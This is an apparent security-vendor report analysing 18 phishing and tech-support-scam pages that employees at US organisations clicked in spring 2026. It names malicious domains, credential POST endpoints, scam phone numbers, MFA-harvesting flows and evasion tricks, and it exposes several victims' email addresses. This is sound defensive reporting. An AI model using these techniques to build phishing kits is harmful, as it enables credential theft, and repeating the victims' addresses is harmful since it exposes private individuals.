Between March 26, 2026 and April 08, 2026, analysts identified a diverse campaign of 18 phishing incidents demonstrating sophisticated multi-stage credential harvesting operations predominantly targeting Microsoft (11 incidents), with additional impersonation of Adobe, Amazon, American Express, GoDaddy, and Facebook services. The attacks employed advanced evasion techniques including JavaScript-based credential exfiltration via fetch() and XMLHttpRequest methods, extensive code obfuscation through base64 encoding and randomized CSS class names, anti-debugging protections with disabled right-click functionality, and honeypot field bot detection mechanisms designed to evade automated analysis tools. Notable infrastructure abuse patterns emerged including legitimate cloud services (Azure Blob Storage, IPFS distributed hosting, Pantheon WordPress hosting) being weaponized for increased credibility, alongside suspicious .cfd top-level domains likely associated with phishing-as-a-service operations.
The campaign demonstrated sophistication in multi-factor authentication bypass capabilities, with threat actors implementing comprehensive MFA token collection through realistic SMS, authenticator app, and push notification prompts across multiple authentication stages. Emerging tactics included tech support scams using fake system error popups to drive phone-based social engineering, personalized email pre-population from URL parameters suggesting targeted delivery mechanisms, and the systematic replacement of legitimate Microsoft authentication endpoints with malicious infrastructure while maintaining authentic branding and OAuth-like parameter structures.
On April 02, 2026 and April 08, 2026, employees at a Florida organization clicked the above phishing page. This appears to be a tech support scam rather than a traditional credential harvesting phishing page, as there are no functional credential capture forms or JavaScript exfiltration mechanisms present in the code. The page uses sophisticated social engineering tactics including fake Microsoft branding, multiple overlapping popup dialogs simulating "System Error" and "Security" alerts with messages like "Password required for System32" and "Memory access violation at 0x88412," and a persistent chat widget displaying urgent messages about "anomalous activity detected" with a prominently displayed phone number +1 (833) 926-4307.
The site is hosted on the on-forge.com platform and includes advanced visual deception techniques such as disabled input fields to prevent interaction, cursor manipulation (cursor-none), page exit prevention JavaScript, and Facebook pixel tracking for campaign optimization. While technically sophisticated in its visual presentation and psychological manipulation tactics, this represents a moderate sophistication level focused on phone-based social engineering rather than automated credential theft, with the ultimate goal being to trick users into calling the fake support number rather than submitting credentials online.
Related subdomain variants:
This is a sophisticated tech support scam that does not employ traditional credential capture techniques but instead uses psychological manipulation to trick victims into calling a fraudulent phone number (+1 888-654-1398). The page employs advanced social engineering tactics including fake Microsoft branding, fabricated system error pop-ups claiming "Memory access violation at 0x88412" and "Password required for System32," animated chat widgets simulating real-time security analysis with messages about "anomalous activity detected," and multiple overlapping modal dialogs creating artificial urgency.
The site is hosted on Azure Blob Storage (14e00019294b4.z13.web.core.windows.net) and integrates legitimate Tawk.to chat services and Plausible analytics to appear more credible, while using disabled form inputs to prevent any actual data submission and force victims toward the phone-based social engineering attack vector. This represents a moderately sophisticated approach that combines legitimate cloud infrastructure abuse with well-crafted visual deception and psychological pressure tactics, focusing on phone-based fraud rather than automated credential theft.
On April 01, 2026, an employee at a Florida organization clicked the above phishing page.
On April 01, 2026, April 02, 2026, April 03, 2026, April 06, 2026, March 27, 2026, and March 31, 2026, employees at a Georgia organization clicked the above phishing page.
On April 01, 2026, March 26, 2026, and March 31, 2026, employees at a Idaho organization clicked the above phishing page.
On April 06, 2026, March 26, 2026, and March 27, 2026, employees at a Illinois organization clicked the above phishing page.
On April 01, 2026, April 02, 2026, April 06, 2026, March 26, 2026, and March 31, 2026, employees at a Kentucky organization clicked the above phishing page.
On April 03, 2026, an employee at a Maryland organization clicked the above phishing page.
On April 06, 2026, an employee at a Nevada organization clicked the above phishing page.
On April 01, 2026, April 02, 2026, April 07, 2026, April 08, 2026, March 26, 2026, March 27, 2026, and March 31, 2026, employees at a Texas organization clicked the above phishing page.
On April 03, 2026, an employee at a Virginia organization clicked the above phishing page.
On April 01, 2026, an employee at a Washington organization clicked the above phishing page.
Related subdomain variants:
On April 08, 2026, an employee at a Florida organization clicked the above phishing page. This is a sophisticated multi-stage Microsoft credential harvesting kit that captures usernames, passwords, and MFA tokens through JavaScript-based exfiltration rather than traditional form POST methods, with data likely transmitted via fetch() or XMLHttpRequest to backend endpoints (specific URLs are obfuscated in referenced external JS files). The kit employs advanced evasion techniques including extensive code obfuscation with base64-encoded configurations, randomized CSS class names throughout the interface, anti-debugging protections that disable text selection and right-click functionality, and bot detection mechanisms through honeypot fields and security validation handlers.
The phishing page demonstrates high sophistication with realistic Microsoft branding, a convincing loading screen animation, multi-step authentication flow that mimics genuine Microsoft login including authenticator app prompts and SMS verification, and appears to be hosted on legitimate infrastructure (the domain suggests a compromised UK scaffolding company website). Notable advanced features include real-time form validation, dynamic content switching between authentication methods, and integration with security libraries that likely perform environment detection and anti-analysis checks before credential exfiltration occurs.
On April 07, 2026, an employee at a California organization clicked the above phishing page. This appears to be a basic password prompt page that uses standard HTML form submission for credential capture, though the HTML provided is incomplete and cuts off before showing the actual form element or JavaScript submission code. The page employs Microsoft branding impersonation with a professional-looking design that includes complex SVG background graphics to appear legitimate, and incorporates the victim's email address (haley_w_2000@hotmail.com) directly in the URL fragment for personalization.
The page is hosted on IPFS (InterPlanetary File System) via dweb.link, which is a legitimate distributed storage service commonly abused by threat actors for hosting phishing content due to its decentralized nature and difficulty in takedown. This represents a basic to moderate sophistication level, utilizing service abuse for hosting infrastructure and social engineering through brand impersonation and personalization, though without seeing the complete form submission mechanism, the exact credential exfiltration method cannot be definitively determined.
On April 07, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page employs multi-stage credential harvesting using JavaScript-based form submissions that POST to obfuscated endpoints, with the primary collection handled through fetch() requests to dynamically determined URLs based on base64-encoded configuration variables. The page implements sophisticated evasion techniques including anti-debugging protections (disabled right-click, text selection blocking), bot detection through honeypot fields with class "a_panel_796", and security validation systems that check for developer tools or automated analysis environments before displaying content.
Notable advanced features include a complete Microsoft 365 authentication flow simulation with MFA collection (supports authenticator apps, SMS codes, and push notifications), real-time form validation with dynamic error messaging using obfuscated image-based responses, and extensive code obfuscation through randomized CSS class names and base64-encoded JavaScript configuration objects. The sophistication level is advanced, particularly due to the comprehensive multi-factor authentication bypass capabilities, anti-analysis measures, and the realistic replication of Microsoft's entire sign-in process including loading animations, responsive design, and authentic-looking error states that would effectively deceive users into providing complete account credentials and bypass tokens.
On April 02, 2026 and April 06, 2026, employees at a Kentucky organization clicked the above phishing page. This phishing page employs a sophisticated Microsoft login impersonation hosted on artistlk.com that captures credentials via standard form POST to https://artistlk.com/common/login, mimicking legitimate Microsoft Azure AD authentication infrastructure. The page implements advanced evasion techniques including base64-encoded JavaScript obfuscation (ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXt...), comprehensive error handling via WebWatson telemetry system, and sophisticated browser fingerprinting through device detection and user-agent analysis.
The site demonstrates high technical sophistication by implementing complete Microsoft authentication flow simulation including FIDO challenge tokens, OAuth state management, and tenant branding customization, while using GoGuardian script injection and Cloudflare infrastructure to appear legitimate. Notably, it pre-fills the victim's email address (kelley.moore@carter.kyschools.us) extracted from URL parameters, implements circuit breaker patterns for resource loading failures, and includes comprehensive session state management that closely mirrors genuine Microsoft login infrastructure.
On April 02, 2026, an employee at a Minnesota organization clicked the above phishing page. This phishing page uses a standard HTML form POST method to capture credentials, submitting data to "processmail.php" for initial email/password collection and "process.php" for OTP collection in a sophisticated multi-stage attack flow. The site impersonates Adobe and multiple email providers (Outlook, Office365, Yahoo, Gmail, AOL) with convincing branding and implements a realistic two-factor authentication bypass by displaying fake OTP prompts with countdown timers and loading animations to create urgency and legitimacy.
The page demonstrates moderate to advanced sophistication through its multi-stage credential harvesting (first login attempt shows "Incorrect Password," second attempt triggers OTP flow), detailed social engineering with provider-specific imagery and messaging, and professional UI elements including animated confetti effects and responsive design. Notable technical features include jQuery-based AJAX submission handling, dynamic modal population based on the selected email provider, and a realistic 5-minute countdown timer for the OTP stage, all hosted on the "axim.digital" domain with Cloudflare protection services.
On April 02, 2026, an employee at a Florida organization clicked the above phishing page. This phishing page primarily captures credentials through standard HTML form submission that would POST to various API endpoints on the malicious domain sso.psvvadmin.com, including login paths like */api/idp/login* and */api/pass/login* as configured in the KPSDK JavaScript module. The page demonstrates moderate sophistication through several notable TTPs: it uses base64-encoded JavaScript obfuscation in the initial script tag, implements comprehensive Microsoft 365/GoDaddy brand impersonation with authentic-looking logos and styling, and includes advanced evasion techniques such as device fingerprinting through TransUnion's risk assessment system and Kasada bot detection services.
The infrastructure leverages the suspicious domain psvvadmin.com (likely typosquatting godaddy.com) while loading legitimate resources from img6.wsimg.com to maintain authenticity, and the page includes extensive URL parameters suggesting it was delivered through a targeted email campaign with victim-specific information like "darren@citysidesuites.com" pre-populated. Most notably, the page implements real-time credential validation capabilities and multi-factor authentication collection through the comprehensive API endpoint configuration, indicating this is likely part of a sophisticated phishing-as-a-service operation rather than a basic credential harvester.
On April 01, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page captures credentials through JavaScript-based exfiltration using fetch() requests to external endpoints, implementing a sophisticated multi-stage Microsoft login simulation that progressively collects email, password, and MFA codes across multiple realistic interface screens. The page employs extensive evasion techniques including randomized CSS class names throughout the code, base64-encoded configuration parameters (prop_type_769, prop_text_527, var_state_502, etc.), anti-debugging protection with disabled text selection and right-click context menus, and references to security validation systems (PageValidator.create, securityHandler) suggesting bot detection capabilities.
The infrastructure appears to use the suspicious domain "elevatcapital.cfd" with an extremely long obfuscated URL path containing random characters, indicating either compromised hosting or a disposable phishing service. This represents an advanced-level phishing kit with professional-grade Microsoft interface mimicry, comprehensive MFA collection (SMS codes, authenticator app approval, verification codes), and sophisticated anti-analysis measures designed to evade detection while capturing complete authentication flows.
On April 01, 2026, an employee at a Maryland organization clicked the above phishing page. This phishing page uses standard HTML form submission to capture credentials, posting to the same domain (willood.com) which impersonates Amazon through consistent branding, logos, and the title "Log In - Amazon". The most significant TTPs observed include sophisticated brand impersonation with legitimate-looking Amazon logos served from a CDN (cdn.materialjyh.com), extensive JavaScript obfuscation using URL-encoded configuration data that when decoded reveals detailed e-commerce functionality mimicking a legitimate shopping platform, and integration with multiple tracking pixels including Pinterest, TikTok, and Facebook for evasion and analytics.
The infrastructure appears to be a purpose-built phishing site rather than compromised legitimate hosting, with the domain willood.com clearly designed to deceive users into believing they're interacting with Amazon's legitimate login portal. This represents a moderate to advanced sophistication level due to the extensive configuration system, multiple tracking integrations, and detailed brand impersonation elements that go far beyond a basic credential capture form.
On March 30, 2026 and March 31, 2026, employees at a Florida organization clicked the above phishing page. This Microsoft phishing page employs a multi-stage credential capture system that collects username, password, and MFA codes through standard form submissions handled by JavaScript event listeners, with the stolen data likely transmitted via fetch() or XMLHttpRequest calls to the attacker's server (though the specific exfiltration endpoints are obfuscated in external JS files). The page demonstrates moderate sophistication with several notable evasion techniques including anti-bot honeypot fields (class a_module_706 with hidden positioning), disabled right-click and text selection via CSS user-select properties, anti-debugging protection through PageValidator and securityHandler objects, and obfuscated configuration data using base64 encoding (visible in prop_flag_527 and prop_state_758 variables).
The site is hosted on a suspicious domain (platformcorp.cfd) and implements a convincing Microsoft authentication flow replica complete with animated loading screens, realistic form validation, multiple 2FA collection stages (SMS codes, authenticator app approval, verification codes), and sophisticated UI elements that closely mimic legitimate Microsoft login pages. The presence of comprehensive bot detection, randomized CSS class names for fingerprint avoidance, and the multi-vector MFA collection capability indicates this is likely part of a professional phishing kit designed for high-value target compromise rather than a basic credential harvester.
On March 30, 2026, an employee at a Kentucky organization clicked the above phishing page. This is a sophisticated tech support scam that uses visual deception rather than traditional credential harvesting, with no actual form submissions or JavaScript exfiltration mechanisms present in the code. The page employs multiple layers of social engineering including fake Facebook account suspension notices, simulated Windows Security threats with fabricated "Trojan:Win32/Hive.ZY" warnings, cascading error popup animations, and persistent phone number displays (+1 844-519-6992) designed to pressure victims into calling for "emergency support."
The site is hosted on Azure Front Door (azurefd.net) and uses sophisticated visual manipulation with disabled form inputs, fake progress bars, simulated terminal windows showing malicious code, and multiple overlapping modal dialogs to create panic. While technically advanced in its presentation and psychological manipulation tactics, the scam relies entirely on phone-based social engineering rather than automated credential capture, representing a moderate sophistication level focused on convincing users their systems are compromised to extract payment or remote access permissions over the phone.
On March 30, 2026, an employee at a Texas organization clicked the above phishing page. This phishing page uses a multi-stage credential capture approach with form POST submissions to "processmail.php" for initial credentials and "process.php" for OTP collection, implementing a sophisticated three-stage attack flow that first accepts any credentials, then shows "Incorrect Password" to prompt re-entry, and finally requests OTP/MFA tokens through a fake time-pressured countdown interface. The page impersonates Greenvelope invitation services while targeting multiple email providers (Outlook, Office365, Yahoo, AOL) and employs several social engineering tactics including urgency messaging about invitation access, fake loading animations with "Verifying..." text, and legitimate brand logos to establish trust.
The infrastructure appears to use a suspicious domain "donman.mpinvitepartyhh.de" with Cloudflare services, and the sophistication level is moderate due to the multi-modal collection approach, staged JavaScript form handling that simulates authentication failures, and the inclusion of MFA bypass capabilities with realistic countdown timers. The most notable aspect is the deliberate "stage-three" JavaScript logic that ensures victims re-enter credentials after an initial "incorrect password" response, maximizing the likelihood of capturing valid credentials.
On March 28, 2026, an employee at a Illinois organization clicked the above phishing page. This phishing page uses a standard HTML form credential capture mechanism that appears to POST to the same domain upon submission, targeting American Express customers through brand impersonation with obfuscated Unicode text rendering (e.g., "áªoÉ¡ â ᥠto Îy ÐϲÑouá¥t" for "Log in to My Account"). The page employs several evasion techniques including responsive design elements that hide navigation components on smaller screens, custom CSS styling to mimic legitimate American Express branding, and a full-screen loading overlay with spinning animation to create false legitimacy during form processing.
The site is hosted on the suspicious domain "ameurincaprures.com" with a complex nested URL path structure, and incorporates social engineering elements like professional styling, American flag imagery, trust indicators through fake footer links and social media icons, plus comprehensive form fields including account type selection to maximize credential collection. The sophistication level is moderate, notable for its extensive CSS styling to closely replicate the authentic American Express login experience and the Unicode obfuscation technique used to disguise text content while maintaining visual similarity to legitimate branding.
On March 27, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page captures credentials through a jQuery AJAX POST request to a validation endpoint using obfuscated JavaScript code that heavily employs custom base-85 style encoding functions (vBeUBGG, OQgDlz, AlkVvT) to hide malicious functionality. The site impersonates GoDaddy's Office 365 login interface and includes sophisticated evasion techniques such as honeypot field detection that redirects victims to a random Wikipedia page if bot behavior is detected, caps lock detection warnings, real-time password visibility toggles, and multi-layered obfuscation that makes static analysis difficult.
The infrastructure appears to be hosted on a suspicious domain (circuitcorp.cfd) with an extremely long URL path containing encoded parameters, and the code references security tokens and timestamps suggesting coordination with a backend credential validation system. This represents an advanced-level phishing kit with significant anti-analysis measures, real-time form validation, and sophisticated JavaScript obfuscation that goes well beyond basic form submission phishing.
On March 27, 2026, an employee at an organization clicked the above phishing page. This appears to be a legitimate GLPI (IT Asset Management software) login page rather than a phishing site, as evidenced by the authentic GLPI framework structure, proper CSS/JavaScript module loading, comprehensive localization files, and standard form-based authentication without any credential exfiltration mechanisms. The page uses a standard HTML form submission method for authentication, loads extensive legitimate GLPI JavaScript modules including TinyMCE editor, FullCalendar, and various UI components, and demonstrates the complexity typical of genuine enterprise software with proper internationalization support for dozens of languages.
The HTML structure shows no obfuscation, no external credential harvesting endpoints, no social engineering tactics, and maintains the authentic GLPI branding and functionality. This represents a basic authentication form with standard sophistication levels expected from legitimate enterprise software, hosted on what appears to be an internal network (e465glpi/) suggesting it may be an internal company GLPI instance rather than a malicious phishing attempt.
On March 26, 2026, an employee at a Kentucky organization clicked the above phishing page. This appears to be a compromised legitimate WordPress website (dev-fourriversrealtor-com.pantheonsite.io) being used to host phishing content, with the victim's email address pre-populated in the URL parameter (patricia.seabolt%40bath.kyschools.us) suggesting email-based delivery with personalization. The HTML shows a standard WordPress theme (Astra) with Gravity Forms integration, but the actual credential capture mechanism is not visible in the provided HTML head section - the form submission endpoint and method would be contained in the body content which was truncated.
The infrastructure leverages Pantheon hosting (a legitimate WordPress hosting platform) making it appear more trustworthy, and the presence of the pre-filled email parameter indicates basic personalization to increase victim trust. This represents a moderate sophistication attack using compromised legitimate infrastructure rather than purpose-built phishing domains, though the actual credential harvesting mechanism cannot be determined from the incomplete HTML provided.
On March 26, 2026, an employee at a Kentucky organization clicked the above phishing page. This phishing page employs a sophisticated Microsoft login impersonation that captures credentials through standard form POST submission to "/common/login" on the malicious domain ranksizexxl.click, while simultaneously implementing several advanced evasion techniques. The page demonstrates high sophistication by perfectly replicating Microsoft's authentic login interface including legitimate Microsoft CDN references (aadcdn.msftauth.net), complex OAuth-like parameter structures, and extensive JavaScript configuration that mimics real Microsoft authentication flows. Notable TTPs include the use of legitimate Microsoft branding and CSS/JS resources to enhance credibility, URL manipulation where legitimate Microsoft URLs are systematically replaced with the malicious domain (ranksizexxl.click/2/ and ranksizexxl.click/common/), and the implementation of Microsoft's actual authentication flow structure including nonces, state parameters, and session management. The attack is particularly sophisticated as it maintains the complete look, feel, and behavior of a genuine Microsoft login page while redirecting all authentication attempts to attacker-controlled infrastructure, representing an advanced-level threat that would be extremely difficult for users to distinguish from legitimate Microsoft services.
Learn how PhishID can help protect your district from cutting-edge threats like these! Schedule a Demo